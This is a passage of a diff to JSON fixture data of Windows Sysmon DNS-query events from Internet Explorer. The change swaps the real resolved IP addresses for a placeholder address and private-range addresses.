UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6258,7 +6258,7 @@ "ProcessId": "2736", "QueryName": "cdn.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;" + "QueryResults": "type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;" } } }, 
@@ -6271,7 +6271,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn3.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -6290,7 +6290,7 @@ "ProcessId": "2736", "QueryName": "cdn3.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;", + "QueryResults": "type: 5 cdn.doubleverify.com;type: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.357" }, 
@@ -6325,7 +6325,7 @@
 "ProcessId": "2736",
 "QueryName": "rtb0.doubleverify.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;",
+ "QueryResults": "type: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:07.721",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -6348,7 +6348,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054327300Z'/\u003e\u003cEventRecordID\u003e175\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.721\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb0.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 bs-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -6359,7 +6359,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054344600Z'/\u003e\u003cEventRecordID\u003e176\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.774\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edev.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6378,7 +6378,7 @@
 "event_data": {
 "QueryName": "dev.virtualearth.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:20.36.236.157;",
+ "QueryResults": "type: 5 platform.maps.glbdns2.microsoft.com;type: 5 fe-bmplatform-prod-atm.trafficmanager.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:07.774",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -6401,7 +6401,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054356200Z'/\u003e\u003cEventRecordID\u003e177\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.ssl.ak.dynamic.tiles.virtualearth.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -6427,7 +6427,7 @@ "ProcessId": "2736", "QueryName": "t.ssl.ak.dynamic.tiles.virtualearth.net", "QueryStatus": "0", - "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:23.52.161.238;" + "QueryResults": "type: 5 t.ssl.ak.dynamic.tiles.virtualearth.net.edgekey.net;type: 5 e7622.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "pid": 2828, 
@@ -6440,7 +6440,7 @@ { "@timestamp": "2021-05-05T15:30:51.709Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054411600Z'/\u003e\u003cEventRecordID\u003e178\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.943\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erp.gwallet.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6456,7 +6456,7 @@ "event_data": { "QueryName": "rp.gwallet.com", "QueryStatus": "0", - "QueryResults": "::ffff:74.217.253.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.943", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6483,7 +6483,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054422900Z'/\u003e\u003cEventRecordID\u003e179\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.945\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, 
